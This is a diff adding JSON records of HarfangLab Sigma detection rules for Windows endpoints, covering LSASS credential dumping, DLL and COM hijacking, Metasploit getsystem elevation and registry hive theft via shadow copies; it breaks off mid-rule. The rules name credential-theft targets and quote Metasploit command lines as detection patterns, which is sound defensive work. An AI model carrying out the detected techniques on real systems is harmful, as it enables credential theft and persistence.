+ "backend_detection": false,
+ "origin_stack": {
+ "id": "b8e2fe4fc90e4d08",
+ "name": null,
+ "is_current": false,
+ "is_supervisor": true,
+ "is_tenant": false
+ },
+ "tenant": "b8e2fe4fc90e4d08",
+ "rule_is_depended_on": [],
+ "rule_type": "sigma_rule",
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:35.297348Z",
+ "creation_date": "2026-03-23T11:45:35.297352Z",
+ "enabled": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:35.297359Z",
+ "rule_level": "high",
+ "rule_confidence": "moderate",
+ "rule_confidence_override": null,
+ "references": [
+ "https://www.sentinelone.com/labs/operation-tainted-love-chinese-apts-target-telcos-in-new-attacks/",
+ "https://github.com/gentilkiwi/mimikatz"
+ ],
+ "name": "t1003_001_lsass_dropping_file_unknown_module.yml",
+ "content": "title: File Dropped by LSASS Process from Unknown Module\nid: 02b0f6f4-476e-4b12-8067-6fbac9b0fc30\ndescription: |\n Detects when a file is written to disk by the Local Security Authority Subsystem Service (LSASS) process from an unknown module.\n The LSASS process is responsible for authentications in Windows.\n Adversaries may attempt to access credential material stored in the LSASS' process memory.\n A file dropped by the LSASS process could be the result of credential theft.\n It is recommended to investigate processes loaded before LSASS dropped this file as well as to download the dropped file for analysis.\n If this activity is recurrent in your environment and you've determined its legitimacy, it is highly recommended to whitelist the concerned path.\nreferences:\n - https://www.sentinelone.com/labs/operation-tainted-love-chinese-apts-target-telcos-in-new-attacks/\n - https://github.com/gentilkiwi/mimikatz\ndate: 2025/03/24\nmodified: 2026/03/05\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1003.001\n - classification.Windows.Source.Filesystem\n - classification.Windows.Behavior.CredentialAccess\nlogsource:\n product: windows\n category: filesystem_create\ndetection:\n selection:\n Image: '?:\\Windows\\System32\\lsass.exe'\n MinimalStackTrace|endswith: '|UNKNOWN'\n\n exclusion_netlogon:\n Path: '?:\\Windows\\System32\\config\\netlogon.ftl'\n\n exclusion_path:\n Path:\n - '?:\\ProgramData\\Microsoft\\Crypto\\Keys\\\\????????????????????????????????_????????-????-????-????-????????????'\n - '?:\\ProgramData\\Microsoft\\Crypto\\SystemKeys\\\\????????????????????????????????_????????-????-????-????-????????????'\n - '?:\\System Volume Information\\EFS0.LOG'\n - '?:\\Windows\\NTDS\\edbtmp.log'\n - '?:\\Users\\\\*\\AppData\\Local\\Microsoft\\\\*'\n - '?:\\Users\\\\*\\AppData\\Local\\Packages\\\\*'\n - '?:\\Users\\\\*\\AppData\\LocalLow\\Microsoft\\\\*'\n - '?:\\Users\\\\*\\AppData\\Roaming\\Microsoft\\\\*'\n - '?:\\Windows\\ServiceProfiles\\\\*\\AppData\\Local\\Microsoft\\\\*'\n - '?:\\Windows\\ServiceProfiles\\\\*\\AppData\\Roaming\\Microsoft\\\\*'\n - '?:\\Windows\\System32\\config\\systemprofile\\AppData\\Local\\Microsoft\\\\*'\n - '?:\\Windows\\System32\\config\\systemprofile\\AppData\\LocalLow\\Microsoft\\\\*'\n - '?:\\Windows\\System32\\Microsoft\\Protect\\S-*\\\\????????-????-????-????-????????????'\n - '?:\\Windows\\System32\\Microsoft\\Protect\\S-*\\User\\\\????????-????-????-????-????????????'\n\n exclusion_credential_manager:\n Path:\n - '?:\\Users\\\\*\\AppData\\Local\\Microsoft\\Vault\\\\????????-????-????-????-????????????\\\\????????????????????????????????????????.vcrd'\n - '?:\\Users\\\\*\\AppData\\Local\\Microsoft\\Vault\\\\????????-????-????-????-????????????\\\\????????-????-????-????-????????????.vsch'\n\n exclusion_securetimeaggregator:\n Path: '?:\\Windows\\System32\\\\????????-????-????-????-????????????'\n StackTrace|contains: '|?:\\Windows\\System32\\SecureTimeAggregator.dll!'\n\n exclusion_btpass:\n MinimalStackTrace|contains: '|BTPassAsm.dll|'\n Path: '?:\\Windows\\BTPass\\BT*.txt'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: moderate\n",
+ "block_on_agent": false,
+ "quarantine_on_agent": false,
+ "rule_level_override": null,
+ "rule_id": "02b0f6f4-476e-4b12-8067-6fbac9b0fc30",
+ "rule_name": "File Dropped by LSASS Process from Unknown Module",
+ "rule_description": "Detects when a file is written to disk by the Local Security Authority Subsystem Service (LSASS) process from an unknown module.\nThe LSASS process is responsible for authentications in Windows.\nAdversaries may attempt to access credential material stored in the LSASS' process memory.\nA file dropped by the LSASS process could be the result of credential theft.\nIt is recommended to investigate processes loaded before LSASS dropped this file as well as to download the dropped file for analysis.\nIf this activity is recurrent in your environment and you've determined its legitimacy, it is highly recommended to whitelist the concerned path.\n",
+ "rule_creation_date": "2025-03-24",
+ "rule_modified_date": "2026-03-05",
+ "rule_os": "windows",
+ "rule_status": null,
+ "rule_tactic_tags": [
+ "attack.credential_access"
+ ],
+ "rule_technique_tags": [
+ "attack.t1003.001"
+ ],
+ "warnings": null,
+ "errors": null,
+ "declared_in": null,
+ "source": "0950c540-b155-4054-9b93-8fb2888de6ed"
+}
+{
+ "id": "02c15562-11e7-4250-b6e6-12f040b41450",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "alert",
+ "effective_state": "alert",
+ "rule_effective_level": "high",
+ "rule_effective_confidence": "strong",
+ "alert_count": 0,
+ "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
+ "rule_level_overridden": false,
+ "whitelist_count": 0,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "endpoint_detection": true,
+ "backend_detection": false,
+ "origin_stack": {
+ "id": "b8e2fe4fc90e4d08",
+ "name": null,
+ "is_current": false,
+ "is_supervisor": true,
+ "is_tenant": false
+ },
+ "tenant": "b8e2fe4fc90e4d08",
+ "rule_is_depended_on": [],
+ "rule_type": "sigma_rule",
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:34.591575Z",
+ "creation_date": "2026-03-23T11:45:34.591579Z",
+ "enabled": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:34.591587Z",
+ "rule_level": "high",
+ "rule_confidence": "strong",
+ "rule_confidence_override": null,
+ "references": [
+ "https://securityintelligence.com/posts/windows-features-dll-sideloading/",
+ "https://github.com/xforcered/WFH",
+ "https://wietze.github.io/blog/save-the-environment-variables",
+ "https://attack.mitre.org/techniques/T1574/001/"
+ ],
+ "name": "t1574_001_dll_hijacking_iesettingsync.yml",
+ "content": "title: DLL Hijacking via IESettingSync.exe\nid: 02c15562-11e7-4250-b6e6-12f040b41450\ndescription: |\n Detects potential Windows DLL Hijacking via IESettingSync.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://wietze.github.io/blog/save-the-environment-variables\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'IESettingSync.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\cabinet.dll'\n - '\\iertutil.dll'\n - '\\mpr.dll'\n - '\\sspicli.dll'\n - '\\umpdc.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
+ "block_on_agent": false,
+ "quarantine_on_agent": false,
+ "rule_level_override": null,
+ "rule_id": "02c15562-11e7-4250-b6e6-12f040b41450",
+ "rule_name": "DLL Hijacking via IESettingSync.exe",
+ "rule_description": "Detects potential Windows DLL Hijacking via IESettingSync.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
+ "rule_creation_date": "2022-09-15",
+ "rule_modified_date": "2025-07-11",
+ "rule_os": "windows",
+ "rule_status": null,
+ "rule_tactic_tags": [
+ "attack.defense_evasion",
+ "attack.persistence",
+ "attack.privilege_escalation"
+ ],
+ "rule_technique_tags": [
+ "attack.t1574.001"
+ ],
+ "warnings": null,
+ "errors": null,
+ "declared_in": null,
+ "source": "0950c540-b155-4054-9b93-8fb2888de6ed"
+}
+{
+ "id": "02ce0f33-c820-4f8d-8af4-6118aa5e0f86",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "alert",
+ "effective_state": "alert",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "strong",
+ "alert_count": 0,
+ "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
+ "rule_level_overridden": false,
+ "whitelist_count": 0,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "endpoint_detection": true,
+ "backend_detection": false,
+ "origin_stack": {
+ "id": "b8e2fe4fc90e4d08",
+ "name": null,
+ "is_current": false,
+ "is_supervisor": true,
+ "is_tenant": false
+ },
+ "tenant": "b8e2fe4fc90e4d08",
+ "rule_is_depended_on": [],
+ "rule_type": "sigma_rule",
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:34.077208Z",
+ "creation_date": "2026-03-23T11:45:34.077210Z",
+ "enabled": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:34.077214Z",
+ "rule_level": "critical",
+ "rule_confidence": "strong",
+ "rule_confidence_override": null,
+ "references": [
+ "https://docs.rapid7.com/metasploit/meterpreter-getsystem/",
+ "https://github.com/rapid7/metasploit-payloads/blob/master/c/meterpreter/source/extensions/priv/elevate.c#L70",
+ "https://github.com/rapid7/metasploit-payloads/blob/master/c/meterpreter/source/extensions/priv/namedpipe.c",
+ "https://attack.mitre.org/techniques/T1134/001/"
+ ],
+ "name": "t1134_001_metasploit_get_system.yml",
+ "content": "title: Metasploit Get SYSTEM Command Detected\nid: 02ce0f33-c820-4f8d-8af4-6118aa5e0f86\ndescription: |\n Detects a suspicious attempt to elevate privilege to local SYSTEM via the Metasploit Framework.\n Metasploit is a penetration testing framework used for exploiting vulnerabilities, gaining unauthorized access, performing privilege escalation, and conducting post-exploitation activities.\n Metasploit spawns a service to elevate from local Admin to local SYSTEM via Named Pipe Impersonation.\n It is recommended to investigate other malicious actions taken by the detected process and its ancestors.\nreferences:\n - https://docs.rapid7.com/metasploit/meterpreter-getsystem/\n - https://github.com/rapid7/metasploit-payloads/blob/master/c/meterpreter/source/extensions/priv/elevate.c#L70\n - https://github.com/rapid7/metasploit-payloads/blob/master/c/meterpreter/source/extensions/priv/namedpipe.c\n - https://attack.mitre.org/techniques/T1134/001/\ndate: 2022/02/14\nmodified: 2025/01/28\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1134.001\n - attack.t1569.002\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Framework.Metasploit\n - classification.Windows.Behavior.PrivilegeEscalation\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_services:\n ParentImage|endswith: '\\services.exe'\n\n selection_variant_cmd:\n # cmd.exe /c echo lddocl > \\\\.\\pipe\\lddocl\n Image|endswith: '\\cmd.exe'\n CommandLine|endswith: '/c echo ?????? > \\\\\\\\.\\\\pipe\\\\??????'\n\n selection_variant_rundll32:\n # rundll32.exe C:\\Windows\\TEMP\\lddocl.dll,a /p:lddocl\n Image|endswith: '\\rundll32.exe'\n CommandLine|endswith: '??????.dll,a /p:??????'\n\n condition: selection_services and 1 of selection_variant_*\nlevel: critical\nconfidence: strong",
+ "block_on_agent": false,
+ "quarantine_on_agent": false,
+ "rule_level_override": null,
+ "rule_id": "02ce0f33-c820-4f8d-8af4-6118aa5e0f86",
+ "rule_name": "Metasploit Get SYSTEM Command Detected",
+ "rule_description": "Detects a suspicious attempt to elevate privilege to local SYSTEM via the Metasploit Framework.\nMetasploit is a penetration testing framework used for exploiting vulnerabilities, gaining unauthorized access, performing privilege escalation, and conducting post-exploitation activities.\nMetasploit spawns a service to elevate from local Admin to local SYSTEM via Named Pipe Impersonation.\nIt is recommended to investigate other malicious actions taken by the detected process and its ancestors.\n",
+ "rule_creation_date": "2022-02-14",
+ "rule_modified_date": "2025-01-28",
+ "rule_os": "windows",
+ "rule_status": null,
+ "rule_tactic_tags": [
+ "attack.execution"
+ ],
+ "rule_technique_tags": [
+ "attack.t1134.001",
+ "attack.t1569.002"
+ ],
+ "warnings": null,
+ "errors": null,
+ "declared_in": null,
+ "source": "0950c540-b155-4054-9b93-8fb2888de6ed"
+}
+{
+ "id": "02fc96b9-8da8-4b40-8a75-557d9c2f79d3",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "alert",
+ "effective_state": "alert",
+ "rule_effective_level": "high",
+ "rule_effective_confidence": "moderate",
+ "alert_count": 0,
+ "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
+ "rule_level_overridden": false,
+ "whitelist_count": 0,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "endpoint_detection": true,
+ "backend_detection": false,
+ "origin_stack": {
+ "id": "b8e2fe4fc90e4d08",
+ "name": null,
+ "is_current": false,
+ "is_supervisor": true,
+ "is_tenant": false
+ },
+ "tenant": "b8e2fe4fc90e4d08",
+ "rule_is_depended_on": [],
+ "rule_type": "sigma_rule",
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:34.079579Z",
+ "creation_date": "2026-03-23T11:45:34.079581Z",
+ "enabled": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:34.079586Z",
+ "rule_level": "high",
+ "rule_confidence": "moderate",
+ "rule_confidence_override": null,
+ "references": [
+ "https://attack.mitre.org/techniques/T1003/002/",
+ "https://attack.mitre.org/techniques/T1003/004/"
+ ],
+ "name": "t1003_registry_extract_shadowcopy.yml",
+ "content": "title: Sensitive Registry Hive Dumped from Volume Shadow Copy\nid: 02fc96b9-8da8-4b40-8a75-557d9c2f79d3\ndescription: |\n Detects file accesses to registry hives saved inside a Volume Shadow Copy.\n Attackers can use Shadow Copy Volumes to access files that would normally be protected from access by the system.\n This can be indicative of an attempt to access sensitive information stored in registry hives (such as the SAM or the LSA secrets) for credential access.\n It is recommended to investigate the process trying to access the hives for malicious contents.\nreferences:\n - https://attack.mitre.org/techniques/T1003/002/\n - https://attack.mitre.org/techniques/T1003/004/\ndate: 2023/06/26\nmodified: 2025/10/23\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1003\n - attack.t1003.002\n - attack.t1003.004\n - classification.Windows.Source.ShadowCopy\n - classification.Windows.Behavior.VolumeShadowCopy\n - classification.Windows.Behavior.CredentialAccess\nlogsource:\n category: filesystem_shadowcopy\n product: windows\ndetection:\n selection:\n Path|endswith:\n - '\\Windows\\System32\\config\\SYSTEM'\n - '\\Windows\\System32\\config\\SAM'\n - '\\Windows\\System32\\config\\SECURITY'\n - '\\Windows\\System32\\config\\RegBack\\SYSTEM'\n - '\\Windows\\System32\\config\\RegBack\\SAM'\n - '\\Windows\\System32\\config\\RegBack\\SECURITY'\n # - '\\Windows\\System32\\config\\SOFTWARE' # too many FP\n\n selection_remote_system:\n # Impacket’s secretsdump used with the option —use-remoteSSMethod.\n ProcessName: 'system'\n ProcessId: '4'\n SessionLogonType: 3\n\n exclusion_known_fp_win7:\n # seems to happen on win7 and 2008\n CreateOptionsStr:\n - 'FILE_NON_DIRECTORY_FILE|FILE_COMPLETE_IF_OPLOCKED' # 0x0140 / FILE_NON_DIRECTORY_FILE|FILE_COMPLETE_IF_OPLOCKED\n - 'FILE_SYNCHRONOUS_IO_NONALERT|FILE_NON_DIRECTORY_FILE|FILE_COMPLETE_IF_OPLOCKED' # 0x0160 FILE_SYNCHRONOUS_IO_NONALERT|FILE_NON_DIRECTORY_FILE|FILE_COMPLETE_IF_OPLOCKED\n CreateDispositionStr: 'FILE_OPEN' # 0x01 / FILE_OPEN\n\n exclusion_restore_point_creation:\n ProcessCommandLine:\n - '?:\\windows\\system32\\srtasks.exe ExecuteScheduledSPPCreation'\n - '?:\\windows\\system32\\rundll32.exe /d srrstr.dll,ExecuteScheduledSPPCreation'\n\n exclusion_programfiles:\n ProcessImage|startswith:\n - '?:\\Program Files\\'\n - '?:\\Program Files (x86)\\'\n\n exclusion_wbengine:\n ProcessImage: '?:\\Windows\\System32\\wbengine.exe'\n\n exclusion_lsass:\n ProcessImage: '?:\\Windows\\System32\\lsass.exe'\n\n exclusion_vssvc:\n ProcessImage: '?:\\Windows\\system32\\vssvc.exe'\n\n exclusion_defender:\n ProcessImage:\n - '?:\\Program Files\\Windows Defender Advanced Threat Protection\\MsSense.exe'\n - '?:\\Program Files\\Windows Defender\\MsMpEng.exe'\n - '?:\\ProgramData\\Microsoft\\Windows Defender\\platform\\\\*\\MsMpEng.exe'\n - '?:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\\\*\\MpDlpService.exe'\n\n # another specific rule for this\n exclusion_ntdsutil:\n ProcessImage: '?:\\Windows\\System32\\ntdsutil.exe'\n\n exclusion_trusted_installer:\n ProcessImage: '?:\\Windows\\servicing\\TrustedInstaller.exe'\n ProcessParentImage: '?:\\Windows\\System32\\services.exe'\n\n exclusion_sdrsvc:\n ProcessCommandLine: '?:\\WINDOWS\\system32\\svchost.exe -k SDRSVC'\n\n exclusion_rstrui:\n ProcessImage: '?:\\Windows\\system32\\rstrui.exe'\n\n exclusion_recoverydrive:\n # Recovery Media Creator\n ProcessImage: '?:\\Windows\\System32\\RecoveryDrive.exe'\n\n exclusion_search_protocolhost:\n ProcessImage: '?:\\Windows\\System32\\SearchProtocolHost.exe'\n ProcessParentImage: '?:\\Windows\\System32\\SearchIndexer.exe'\n\n exclusion_igfxcui:\n ProcessGrandparentImage: '?:\\Windows\\system32\\igfxCUIService.exe'\n ProcessImage: '?:\\Windows\\System32\\igfxEM.exe'\n\n exclusion_cobian:\n ProcessImage|endswith:\n - '\\Cobian Backup 1?\\cbVSCService1?.exe'\n - '\\Cobian Backup ??\\cbVSCService.exe'\n - '\\Cobian Backup ??\\cbService.exe'\n - '\\CobianBackup\\cbVSCService1?.exe'\n - '\\CobianBackup\\cbVSCService.exe'\n\n exclusion_commvault:\n # For an unknwn reseaon the file has a valid signature but we say it is unsigned...\n ProcessImage|endswith:\n - '\\Commvault\\ContentStore\\Base\\cvd.exe'\n - '\\Commvault\\Base\\CLBackup.exe'\n - '\\Commvault\\ContentStore\\Base\\CLBackup.exe'\n ProcessSignature: 'Commvault Systems, Inc.'\n\n exclusion_dell:\n ProcessDescription: 'Avamar Backup Client'\n ProcessSigned: 'true'\n ProcessSignature:\n - 'Dell Technologies Inc.'\n - 'EMC Corporation'\n\n condition: selection and ((not 1 of exclusion_*) or selection_remote_system)\nlevel: high\nconfidence: moderate\n",
+ "block_on_agent": false,
+ "quarantine_on_agent": false,
+ "rule_level_override": null,
+ "rule_id": "02fc96b9-8da8-4b40-8a75-557d9c2f79d3",
+ "rule_name": "Sensitive Registry Hive Dumped from Volume Shadow Copy",
+ "rule_description": "Detects file accesses to registry hives saved inside a Volume Shadow Copy.\nAttackers can use Shadow Copy Volumes to access files that would normally be protected from access by the system.\nThis can be indicative of an attempt to access sensitive information stored in registry hives (such as the SAM or the LSA secrets) for credential access.\nIt is recommended to investigate the process trying to access the hives for malicious contents.\n",
+ "rule_creation_date": "2023-06-26",
+ "rule_modified_date": "2025-10-23",
+ "rule_os": "windows",
+ "rule_status": null,
+ "rule_tactic_tags": [
+ "attack.credential_access"
+ ],
+ "rule_technique_tags": [
+ "attack.t1003",
+ "attack.t1003.002",
+ "attack.t1003.004"
+ ],
+ "warnings": null,
+ "errors": null,
+ "declared_in": null,
+ "source": "0950c540-b155-4054-9b93-8fb2888de6ed"
+}
+{
+ "id": "032b28af-b4ce-4476-a201-8b2896158878",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "alert",
+ "effective_state": "alert",
+ "rule_effective_level": "high",
+ "rule_effective_confidence": "strong",
+ "alert_count": 0,
+ "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
+ "rule_level_overridden": false,
+ "whitelist_count": 0,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "endpoint_detection": true,
+ "backend_detection": false,
+ "origin_stack": {
+ "id": "b8e2fe4fc90e4d08",
+ "name": null,
+ "is_current": false,
+ "is_supervisor": true,
+ "is_tenant": false
+ },
+ "tenant": "b8e2fe4fc90e4d08",
+ "rule_is_depended_on": [],
+ "rule_type": "sigma_rule",
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:34.623666Z",
+ "creation_date": "2026-03-23T11:45:34.623668Z",
+ "enabled": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:34.623672Z",
+ "rule_level": "high",
+ "rule_confidence": "strong",
+ "rule_confidence_override": null,
+ "references": [
+ "https://www.trellix.com/en-us/about/newsroom/stories/research/prime-ministers-office-compromised.html",
+ "https://www.microsoft.com/security/blog/2022/07/27/untangling-knotweed-european-private-sector-offensive-actor-using-0-day-exploits/",
+ "https://www.microsoft.com/security/blog/2021/07/15/protecting-customers-from-a-private-sector-offensive-actor-using-0-day-exploits-and-devilstongue-malware/",
+ "https://www.welivesecurity.com/en/eset-research/update-winrar-tools-now-romcom-and-others-exploiting-zero-day-vulnerability/",
+ "https://github.com/eset/malware-ioc/blob/master/turla/README.adoc",
+ "https://www.proofpoint.com/us/blog/threat-insight/10-things-i-hate-about-attribution-romcom-vs-transferloader",
+ "https://attack.mitre.org/techniques/T1546/015/"
+ ],
+ "name": "t1546_015_component_object_model_hijacking.yml",
+ "content": "title: Possible Component Object Model Hijacking\nid: 032b28af-b4ce-4476-a201-8b2896158878\ndescription: |\n Detects the possible hijacking of a Component Object Model (COM) in the registry.\n Attackers can use this method to achieve persistence through an event trigger execution.\n The DLL indicated in the hijacked registry key is then loaded when the corresponding COM is called by the system.\n It is recommended to analyze the specified DLL for malicious content and the process making the registry modification for any other suspicious actions.\nreferences:\n - https://www.trellix.com/en-us/about/newsroom/stories/research/prime-ministers-office-compromised.html\n - https://www.microsoft.com/security/blog/2022/07/27/untangling-knotweed-european-private-sector-offensive-actor-using-0-day-exploits/\n - https://www.microsoft.com/security/blog/2021/07/15/protecting-customers-from-a-private-sector-offensive-actor-using-0-day-exploits-and-devilstongue-malware/\n - https://www.welivesecurity.com/en/eset-research/update-winrar-tools-now-romcom-and-others-exploiting-zero-day-vulnerability/\n - https://github.com/eset/malware-ioc/blob/master/turla/README.adoc\n - https://www.proofpoint.com/us/blog/threat-insight/10-things-i-hate-about-attribution-romcom-vs-transferloader\n - https://attack.mitre.org/techniques/T1546/015/\ndate: 2022/09/29\nmodified: 2026/02/02\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.t1546.015\n - attack.execution\n - attack.t1559.001\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.Persistence\n - classification.Windows.Behavior.Hijacking\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: SetValue\n\n selection_ehstorshell:\n TargetObject: 'HKLM\\SOFTWARE\\Classes\\CLSID\\{D9144DCD-E998-4ECA-AB6A-DCD83CCBA16D}\\InprocServer32\\(Default)'\n filter_ehstorshell:\n Details: '?:\\Windows\\System32\\EhStorShell.dll'\n\n selection_wmiutils:\n TargetObject:\n - 'HKLM\\SOFTWARE\\Classes\\CLSID\\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\\InprocServer32\\(Default)' # WbemDefaultPathParser\n - 'HKLM\\SOFTWARE\\Classes\\CLSID\\{EAC8A024-21E2-4523-AD73-A71A0AA2F56A}\\InprocServer32\\(Default)' # WbemQuery\n - 'HKLM\\SOFTWARE\\Classes\\CLSID\\{EB87E1BD-3233-11D2-AEC9-00C04FB68820}\\InprocServer32\\(Default)' # WbemStatusCode\n filter_wmiutils:\n Details: '%systemroot%\\system32\\wbem\\wmiutils.dll'\n\n selection_wmiprvsd:\n TargetObject: 'HKLM\\SOFTWARE\\Classes\\CLSID\\{4DE225BF-CF59-4CFC-85F7-68B90F185355}\\InprocServer32\\(Default)'\n filter_wmiprvsd:\n Details: '%systemroot%\\system32\\wbem\\wmiprvsd.dll'\n\n selection_wbemsvc:\n TargetObject: 'HKLM\\SOFTWARE\\Classes\\CLSID\\{7C857801-7381-11CF-884D-00AA004B2E24}\\InprocServer32\\(Default)'\n filter_wbemsvc:\n Details: '%systemroot%\\system32\\wbem\\wbemsvc.dll'\n\n selection_wbemprox:\n TargetObject: 'HKLM\\SOFTWARE\\Classes\\CLSID\\{4590F811-1D3A-11D0-891F-00AA004B2E24}\\InprocServer32\\(Default)'\n filter_wbemprox:\n Details: '%systemroot%\\system32\\wbem\\wbemprox.dll'\n\n selection_applicationframe:\n TargetObject: 'HKLM\\SOFTWARE\\Classes\\CLSID\\{DDC05A5A-351A-4E06-8EAF-54EC1BC2DCEA}\\InprocServer32\\(Default)'\n filter_applicationframe:\n Details: '%systemroot%\\system32\\applicationframe.dll'\n\n selection_propsys:\n TargetObject: 'HKLM\\SOFTWARE\\Classes\\CLSID\\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\\InprocServer32\\(Default)'\n filter_propsys:\n Details: '%systemroot%\\system32\\propsys.dll'\n\n selection_actioncenter:\n TargetObject: 'HKLM\\SOFTWARE\\Classes\\CLSID\\{F56F6FDD-AA9D-4618-A949-C1B91AF43B1A}\\InprocServer32\\(Default)'\n filter_actioncenter:\n Details: '%systemroot%\\system32\\actioncenter.dll'\n\n selection_thumbcache:\n TargetObject: 'HKCU\\SOFTWARE\\Classes\\CLSID\\{2155fee3-2419-4373-b102-6843707eb41f}\\InprocServer32\\(Default)'\n filter_thumbcache:\n Details: '%systemroot%\\system32\\thumbcache.dll'\n\n selection_syncreg:\n TargetObject: 'HKCU\\SOFTWARE\\Classes\\CLSID\\{f82b4ef1-93a9-4dde-8015-f7950a1a6e31}\\InprocServer32\\(Default)'\n filter_syncreg:\n Details: '%systemroot%\\system32\\syncreg.dll'\n\n selection_repdrvfs:\n TargetObject: 'HKLM\\SOFTWARE\\Classes\\CLSID\\{7998DC37-D3FE-487C-A60A-7701FCC70CC6}\\InprocServer32\\(Default)'\n filter_repdrvfs:\n Details: '?:\\Windows\\system32\\wbem\\repdrvfs.dll'\n\n selection_psfactorybuffer:\n TargetObject:\n - 'HKLM\\SOFTWARE\\Classes\\CLSID\\{1299CF18-C4F5-4B6A-BB0F-2299F0398E27}\\InprocServer32\\(Default)'\n - 'HKLM\\SOFTWARE\\Classes\\CLSID\\{1293C733-3151-48F5-89DE-2457B4AB3FD2}\\InprocServer32\\(Default)'\n filter_psfactorybuffer:\n Details:\n - '?:\\Windows\\System32\\npmproxy.dll'\n - '?:\\Windows\\System32\\daxexec.dll'\n\n selection_sharetaskscheduler:\n TargetObject: 'HKLM\\SOFTWARE\\Classes\\CLSID\\{603D3801-BD81-11d0-A3A5-00C04FD706EC}\\InprocServer32\\(Default)'\n filter_sharetaskscheduler:\n Details: '?:\\Windows\\system32\\windows.storage.dll'\n\n selection_sharingprivate:\n TargetObject: 'HKLM\\SOFTWARE\\Classes\\CLSID\\{08244EE6-92F0-47F2-9FC9-929BAA2E7235}\\InprocServer32\\(Default)'\n filter_sharingprivate:\n Details: '?:\\Windows\\System32\\ntshrui.dll'\n\n selection_eventsystem:\n TargetObject: 'HKLM\\SOFTWARE\\Classes\\CLSID\\{4E14FBA2-2E22-11D1-9964-00C04FBBB345}\\InprocServer32\\(Default)'\n filter_eventsystem:\n Details: '?:\\Windows\\system32\\es.dll'\n\n selection_msaa:\n TargetObject: 'HKLM\\SOFTWARE\\Classes\\CLSID\\{B5F8350B-0548-48B1-A6EE-88BD00B4A5E7}\\InprocServer32\\(Default)'\n filter_msaa:\n Details: '?:\\Windows\\System32\\oleacc.dll'\n\n selection_autoplay:\n TargetObject: 'HKLM\\SOFTWARE\\Classes\\CLSID\\{9207D8C7-E7C8-412E-87F8-2E61171BD291}\\InprocServer32\\(Default)'\n filter_autoplay:\n Details: '?:\\Windows\\system32\\shell32.dll'\n\n selection_notificationmanager:\n TargetObject: 'HKLM\\SOFTWARE\\Classes\\CLSID\\{A3B3C46C-05D8-429B-BF66-87068B4CE563}\\InprocServer32\\(Default)'\n filter_notificationmanager:\n Details: '?:\\Windows\\System32\\actioncenter.dll'\n\n selection_commonplaces:\n TargetObject: 